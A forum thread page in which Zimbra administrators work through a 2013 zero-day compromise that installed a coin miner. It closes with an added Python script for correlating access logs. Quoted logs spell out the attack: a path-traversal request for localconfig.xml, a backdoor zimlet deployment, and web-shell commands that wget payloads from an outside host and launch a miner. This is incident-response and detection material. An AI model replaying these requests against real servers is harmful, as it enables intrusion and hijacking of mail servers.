Page 3 of 4
Results 21 to 30 of 38

Thread: zimbra 0-day

  1. #21
    nrc (Active Member; joined Mar 2007; Columbus, OH)

    Quote Originally Posted by JakeMS:
    I've just checked my previous post.

    It would seem vBulletin scrapped most of the URL.

    Ah! That makes more sense. Yes, I believe what you're seeing now is the expected response from an API request. I still see the same thing with version 8.0.6.

  2. #22
    sugiggs (Loyal Member; joined Sep 2009)

    Other than the obvious "upgrade to the latest version", any other way to "patch" this?

    I have one installation still using version 6.

  3. #23
    mathx2 (New Member; joined Dec 2013)

    So a customer box has a rogue coin miner running on it (mining dogecoin, of all things) under the Zimbra user. I assume this is due to this CVE-2013-7217 0-day exploit.

    I assume once the exploit has been launched, that arbitrary code execution is possible. However, they didn't run it as root, but as the zimbra user, suggesting they didn't root the box (though that's just one local race-condition exploit away, right?)

    Until I can reinstall the server from scratch (what everyone wants to do over the holidays after paying for an expensive piece of software, amirite?), if the machine is already exploited at the zimbra user level, what is the workaround? Firewalled off the admin port already; don't think I can move off port 80 for them (without impacting production). Is the zimbra user password compromised? (I don't see ssh logins, e.g., but who knows). Are they going through login(1), either through ssh or otherwise? (Can we safely change the zimbra password? Or the shell? I bet not, many crontab bits probably require it, though SHELL= could be set).

    Suggestions welcome. (Usually I post under mathx but I can't recover my password - Zimbra doesn't seem to have their mailservers anti-spam compliant, and their HELO doesn't reverse - which is kinda ridiculous for a mail server software company, ya?)
    Last edited by mathx2; 12-30-2013 at 02:01 AM.

  4. #24
    Hien (New Member; joined Dec 2013; HCMC, Viet Nam)

    Quote Originally Posted by mathx2:
    So a customer box has a rogue coin miner running on it (mining dogecoin, of all things) under the Zimbra user. I assume this is due to this CVE-2013-7217 0-day exploit.

    I assume once the exploit has been launched, that arbitrary code execution is possible. However, they didn't run it as root, but as the zimbra user, suggesting they didn't root the box (though that's just one local race-condition exploit away, right?)

    Until I can reinstall the server from scratch (what everyone wants to do over the holidays after paying for an expensive piece of software, amirite?), if the machine is already exploited at the zimbra user level, what is the workaround? Firewalled off the admin port already; don't think I can move off port 80 for them (without impacting production). Is the zimbra user password compromised? (I don't see ssh logins, e.g., but who knows). Are they going through login(1), either through ssh or otherwise? (Can we safely change the zimbra password? Or the shell? I bet not, many crontab bits probably require it, though SHELL= could be set).

    Suggestions welcome. (Usually I post under mathx but I can't recover my password - Zimbra doesn't seem to have their mailservers anti-spam compliant, and their HELO doesn't reverse - which is kinda ridiculous for a mail server software company, ya?)

    Hello,

    Attackers can deploy malicious zimlets. Please check your deployed zimlets in /opt/zimbra/zimlets-deployed/ carefully.

    For example: find /opt/zimbra/zimlets-deployed/ -type f -name "*.jsp" -exec grep "Runtime.getRuntime().exec" {} \;

    Also please check the logs at /opt/zimbra/log; you will see similar log lines if you were attacked by this exploit:

    access_log.2013-12-28:179.43.141.149 - - [28/Dec/2013:02:11:08 +0000] "GET /zimlet/com_zimbra_example_simplejspaction/cmd.jsp HTTP/1.1" 404 1414 "-" "WWW-Mechanize/1.73" 3
    access_log.2013-12-28:179.43.141.149 - - [28/Dec/2013:02:11:10 +0000] "GET /zimlet/com_zimbra_example_simplejspaction/cmd.jsp HTTP/1.1" 404 1414 "-" "WWW-Mechanize/1.73" 6
    access_log.2013-12-28:179.43.141.149 - - [28/Dec/2013:02:11:11 +0000] "GET /res/TemplateMsg.js.zgz?skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 HTTP/1.1" 200 1230 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" 20
    access_log.2013-12-28:179.43.141.149 - - [28/Dec/2013:02:11:13 +0000] "POST /service/admin/soap HTTP/1.1" 200 487 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" 6
    access_log.2013-12-28:179.43.141.149 - - [28/Dec/2013:02:11:14 +0000] "POST /service/admin/soap HTTP/1.1" 200 20677 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" 5
    access_log.2013-12-28:179.43.141.149 - - [28/Dec/2013:02:11:18 +0000] "POST /service/upload HTTP/1.1" 200 242 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" 4
    access_log.2013-12-28:179.43.141.149 - - [28/Dec/2013:02:11:22 +0000] "POST /service/admin/soap/DeployZimletRequest HTTP/1.1" 200 255 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" 71
    access_log.2013-12-28:179.43.141.149 - - [28/Dec/2013:02:11:25 +0000] "POST /service/admin/soap/DeployZimletRequest HTTP/1.1" 200 257 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" 2


    HTH.

  5. #25
    ljramos (Active Member; joined Aug 2007; Delaware USA)

    I have the same issue. Is there a patch/fix for version 6.0_16?

  6. #26
    mathx2 (New Member; joined Dec 2013)

    Quote Originally Posted by Hien:
    Hello,

    Attackers can deploy malicious zimlets. Please check your deployed zimlets in /opt/zimbra/zimlets-deployed/ carefully.

    For example: find /opt/zimbra/zimlets-deployed/ -type f -name "*.jsp" -exec grep "Runtime.getRuntime().exec" {} \;

    Also please check the logs at /opt/zimbra/log; you will see similar log lines if you were attacked by this exploit:

    access_log.2013-12-28:179.43.141.149 - - [28/Dec/2013:02:11:08 +0000] "GET /zimlet/com_zimbra_example_simplejspaction/cmd.jsp HTTP/1.1" 404 1414 "-" "WWW-Mechanize/1.73" 3
    access_log.2013-12-28:179.43.141.149 - - [28/Dec/2013:02:11:10 +0000] "GET /zimlet/com_zimbra_example_simplejspaction/cmd.jsp HTTP/1.1" 404 1414 "-" "WWW-Mechanize/1.73" 6
    access_log.2013-12-28:179.43.141.149 - - [28/Dec/2013:02:11:11 +0000] "GET /res/TemplateMsg.js.zgz?skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 HTTP/1.1" 200 1230 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" 20
    access_log.2013-12-28:179.43.141.149 - - [28/Dec/2013:02:11:13 +0000] "POST /service/admin/soap HTTP/1.1" 200 487 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" 6
    access_log.2013-12-28:179.43.141.149 - - [28/Dec/2013:02:11:14 +0000] "POST /service/admin/soap HTTP/1.1" 200 20677 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" 5
    access_log.2013-12-28:179.43.141.149 - - [28/Dec/2013:02:11:18 +0000] "POST /service/upload HTTP/1.1" 200 242 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" 4
    access_log.2013-12-28:179.43.141.149 - - [28/Dec/2013:02:11:22 +0000] "POST /service/admin/soap/DeployZimletRequest HTTP/1.1" 200 255 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" 71
    access_log.2013-12-28:179.43.141.149 - - [28/Dec/2013:02:11:25 +0000] "POST /service/admin/soap/DeployZimletRequest HTTP/1.1" 200 257 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" 2


    HTH.

    It does help; it looks like this is the case (see logs at bottom of post), AND it's the same IP as yours (!!).

    Meanwhile, I see nothing new or otherwise in /opt/zimbra/zimlets, so they've managed to run code locally through some other action. This would suggest that the hole is WORSE than described. It isn't just people reading mail and changing passwords, but the ability to run local code as well. It isn't quite a remote root exploit, but that's academic with any race-condition toolkit.

    Can we get a reply from a zimbra employee up in here?

    Yeah, you can see it clearly: they wget and install meep.pl, then chmod it, and it eventually runs. Pretty clever.

    Patched the server with the .tgz, but I'm thinking I need to reinstall entirely to be safe > not a good Xmas present!

    179.43.141.149 - - [28/Dec/2013:20:51:34 +0000] "GET /zimlet/com_zimbra_example_simplejspaction/cmd.jsp HTTP/1.1" 404 1414 "-" "WWW-Mechanize/1.73" 4
    179.43.141.149 - - [28/Dec/2013:20:51:35 +0000] "GET /res/TemplateMsg.js.zgz?skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 HTTP/1.1" 200 1284 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" 2
    179.43.141.149 - - [28/Dec/2013:20:51:35 +0000] "POST /service/admin/soap HTTP/1.1" 200 487 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" 13
    179.43.141.149 - - [28/Dec/2013:20:51:36 +0000] "POST /service/admin/soap HTTP/1.1" 200 40514 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" 166
    179.43.141.149 - - [28/Dec/2013:20:51:39 +0000] "POST /service/upload HTTP/1.1" 200 242 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" 8
    179.43.141.149 - - [28/Dec/2013:20:51:41 +0000] "POST /service/admin/soap/DeployZimletRequest HTTP/1.1" 200 254 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" 89
    179.43.141.149 - - [28/Dec/2013:20:51:44 +0000] "POST /service/admin/soap/DeployZimletRequest HTTP/1.1" 200 256 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" 4
    179.43.141.149 - - [28/Dec/2013:20:51:49 +0000] "GET /zimlet/com_zimbra_example_simplejspaction/cmd.jsp HTTP/1.1" 200 184 "-" "WWW-Mechanize/1.73" 2474
    179.43.141.149 - - [28/Dec/2013:20:51:52 +0000] "GET /zimlet/com_zimbra_example_simplejspaction/cmd.jsp HTTP/1.1" 200 184 "https://199.27.180.147/zimlet/com_zimbra_example_simplejspaction/cmd.jsp" "WWW-Mechanize/1.73" 4
    179.43.141.149 - - [28/Dec/2013:20:51:52 +0000] "GET /zimlet/com_zimbra_example_simplejspaction/cmd.jsp?comment=wget+http%3A%2F%2F74.114.204.122%2FCFIDE%2Fmeep+-O+%2Fvar%2Ftmp%2Fmeep.pl HTTP/1.1" 200 255 "https://199.27.180.147/zimlet/com_zimbra_example_simplejspaction/cmd.jsp" "WWW-Mechanize/1.73" 1045
    179.43.141.149 - - [28/Dec/2013:20:51:54 +0000] "GET /zimlet/com_zimbra_example_simplejspaction/cmd.jsp?comment=wget+http%3A%2F%2F74.114.204.122%2FCFIDE%2Fa+-O+%2Fvar%2Ftmp%2Fa HTTP/1.1" 200 246 "https://199.27.180.147/zimlet/com_zimbra_example_simplejspaction/cmd.jsp?comment=wget+http%3A%2F%2F74.114.204.122%2FCFIDE%2Fmeep+-O+%2Fvar%2Ftmp%2Fmeep.pl" "WWW-Mechanize/1.73" 890
    179.43.141.149 - - [28/Dec/2013:20:51:55 +0000] "GET /zimlet/com_zimbra_example_simplejspaction/cmd.jsp?comment=wget+http%3A%2F%2F74.114.204.122%2FCFIDE%2Fb+-O+%2Fvar%2Ftmp%2Fb HTTP/1.1" 200 246 "https://199.27.180.147/zimlet/com_zimbra_example_simplejspaction/cmd.jsp?comment=wget+http%3A%2F%2F74.114.204.122%2FCFIDE%2Fa+-O+%2Fvar%2Ftmp%2Fa" "WWW-Mechanize/1.73" 1355
    179.43.141.149 - - [28/Dec/2013:20:51:57 +0000] "GET /zimlet/com_zimbra_example_simplejspaction/cmd.jsp?comment=chmod+%2Bx+%2Fvar%2Ftmp%2Fa+%2Fvar%2Ftmp%2Fb HTTP/1.1" 200 228 "https://199.27.180.147/zimlet/com_zimbra_example_simplejspaction/cmd.jsp?comment=wget+http%3A%2F%2F74.114.204.122%2FCFIDE%2Fb+-O+%2Fvar%2Ftmp%2Fb" "WWW-Mechanize/1.73" 24
    179.43.141.149 - - [28/Dec/2013:20:51:58 +0000] "GET /zimlet/com_zimbra_example_simplejspaction/cmd.jsp?comment=%2Fvar%2Ftmp%2Fa%20-B%20-o%20stratum%2Btcp%3A%2F%2Fhecks.ddosdev.com%3A53%20-u%20ilovebigdongs.1%20-p%20x%0A HTTP/1.1" 500 8498 "https://199.27.180.147/zimlet/com_zimbra_example_simplejspaction/cmd.jsp?comment=chmod+%2Bx+%2Fvar%2Ftmp%2Fa+%2Fvar%2Ftmp%2Fb" "WWW-Mechanize/1.73" 15
    179.43.141.149 - - [28/Dec/2013:20:52:09 +0000] "GET /zimlet/com_zimbra_example_simplejspaction/cmd.jsp?comment=%2Fvar%2Ftmp%2Fa%20-B%20-o%20stratum%2Btcp%3A%2F%2Fhecks.ddosdev.com%3A3334%20-u%20ilovebigdongs.1%20-p%20x HTTP/1.1" 500 8498 "https://199.27.180.147/zimlet/com_zimbra_example_simplejspaction/cmd.jsp?comment=chmod+%2Bx+%2Fvar%2Ftmp%2Fa+%2Fvar%2Ftmp%2Fb" "WWW-Mechanize/1.73" 13

    Last edited by mathx2; 12-30-2013 at 12:22 PM.

  7. #27
    mathx2 (New Member; joined Dec 2013)

    In case you all didn't clue in (and apparently no one did, because my post is still there _AND_ no one has commented), I've just inadvertently released the entire method of compromise, right down to executing code from remote.

    Don't know if you want to remove that post, that's up to you, though I believe in full disclosure to ensure people fix things.

    You might need to get your Zimbra outbound mailserver reverse DNS fixed, however, to be able to contact some of your customers. I didn't get the warning email because of it. (Funny to think that the exploit could be used to patch vulnerable servers too, in fact!)

  8. #28
    Hien (New Member; joined Dec 2013; HCMC, Viet Nam)

    Hello mathx2,

    In your log, the attacker deployed a new zimlet named "com_zimbra_example_simplejspaction" on your Zimbra server as a backdoor. The directory that needs to be checked is "/opt/zimbra/zimlets-deployed/".

    HTH.

  9. #29
    quanah (Zimbra Employee; joined May 2007)

    The RDNS issue should be fixed at this point, thanks.

    Quanah Gibson-Mount
    Server Architect
    Zimbra, Inc
    --------------------
    Zimbra :: the leader in open source messaging and collaboration

  10. #30
    nrc (Active Member; joined Mar 2007; Columbus, OH)

    Quote Originally Posted by mathx2:
    In case you all didn't clue in (and apparently no one did, because my post is still there _AND_ no one has commented), I've just inadvertently released the entire method of compromise, right down to executing code from remote.

    The initial compromise appears to be the same as the one originally reported and patched. Once that vulnerability is exploited and a privileged account is created there are all sorts of things they can do with that. In your case they deployed a Zimlet which allowed them to execute arbitrary code. As Hien pointed out, the trojan Zimlet is com_zimbra_example_simplejspaction. You should check for that and also check for and remove the account that was created.

    To address your earlier question, you don't need to move from port 80, you just need to update to the recommended versions to close the original vulnerability. 7.2.6 or 8.0.6 are strongly recommended since they close another as yet undisclosed vulnerability. See the two posts below for more info.

    Security Guidance for reported "0day Exploit"
    Critical Security Vulnerability Addressed in 7.2.6/8.0.6 Maintenance Releases
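    Pulling together Hien's log indicators (#24) and nrc's summary of the chain (#30), here is an added Python example, not code from the thread or from Zimbra, that classifies access_log lines into the stages seen above and reports which client IPs completed the chain. The stage names are my own labels, and the log lines inside it are constructed with documentation IPs rather than taken from any real server.

```python
# Added example (not from the thread): correlate Zimbra access_log lines into the
# attack chain described above, per client IP. Sample lines are constructed.
import re
from collections import defaultdict
from urllib.parse import parse_qs, unquote, urlparse

# Optional "access_log.DATE:" grep prefix, combined log format, trailing time field.
LINE_RE = re.compile(
    r'^(?:access_log[^:]*:)?(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+)[^"]*" (?P<status>\d{3}) \S+ "[^"]*" "[^"]*"')

def classify(method, path, query, status):
    """Map one request to a stage of the chain seen in the thread, or None."""
    if path.startswith('/res/') and 'localconfig.xml' in unquote(query) and status == 200:
        return 'localconfig_read'  # skin traversal: admin credentials disclosed
    if method == 'POST' and path.endswith('/DeployZimletRequest'):
        return 'zimlet_deploy'     # zimlet installed through the admin SOAP API
    if method == 'POST' and path in ('/service/admin/soap', '/service/upload'):
        return 'admin_soap'        # admin API use / archive upload before deploy
    if path.startswith('/zimlet/') and path.endswith('.jsp'):
        return 'jsp_hit' if status == 200 else 'jsp_probe'  # 404 = probe, not yet deployed
    return None

def correlate(lines):
    """Per client IP: stages seen, decoded 'comment' values, first/last timestamps."""
    hosts = defaultdict(lambda: {'stages': set(), 'commands': [], 'first': None, 'last': None})
    for m in filter(None, map(LINE_RE.match, lines)):
        u = urlparse(m['url'])
        stage = classify(m['method'], u.path, u.query, int(m['status']))
        if stage is None:
            continue
        h = hosts[m['ip']]
        h['stages'].add(stage)
        h['first'], h['last'] = h['first'] or m['ts'], m['ts']
        if stage == 'jsp_hit':  # the 'comment' parameter carried the command to run
            h['commands'] += parse_qs(u.query).get('comment', [])
    return dict(hosts)

def full_chain(hosts):
    """IPs that both read localconfig.xml and deployed a zimlet: treat host as compromised."""
    return sorted(ip for ip, h in hosts.items() if {'localconfig_read', 'zimlet_deploy'} <= h['stages'])

SAMPLE_LOG = """\
access_log.2013-12-28:192.0.2.10 - - [28/Dec/2013:02:11:08 +0000] "GET /zimlet/com_zimbra_example_simplejspaction/cmd.jsp HTTP/1.1" 404 1414 "-" "WWW-Mechanize/1.73" 3
access_log.2013-12-28:192.0.2.10 - - [28/Dec/2013:02:11:11 +0000] "GET /res/TemplateMsg.js.zgz?skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 HTTP/1.1" 200 1230 "-" "Mozilla/5.0" 20
access_log.2013-12-28:192.0.2.10 - - [28/Dec/2013:02:11:22 +0000] "POST /service/admin/soap/DeployZimletRequest HTTP/1.1" 200 255 "-" "Mozilla/5.0" 71
access_log.2013-12-28:192.0.2.10 - - [28/Dec/2013:02:11:49 +0000] "GET /zimlet/com_zimbra_example_simplejspaction/cmd.jsp?comment=id HTTP/1.1" 200 184 "-" "WWW-Mechanize/1.73" 4
access_log.2013-12-28:198.51.100.7 - - [28/Dec/2013:02:12:00 +0000] "GET /zimbra/ HTTP/1.1" 200 1414 "-" "Mozilla/5.0" 3
""".splitlines()
```

    Run it over `cat /opt/zimbra/log/access_log*` instead of SAMPLE_LOG; an IP in full_chain() with a 'jsp_hit' stage means a zimlet in /opt/zimbra/zimlets-deployed/ was used to run commands, and the decoded 'commands' list tells you what was executed.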
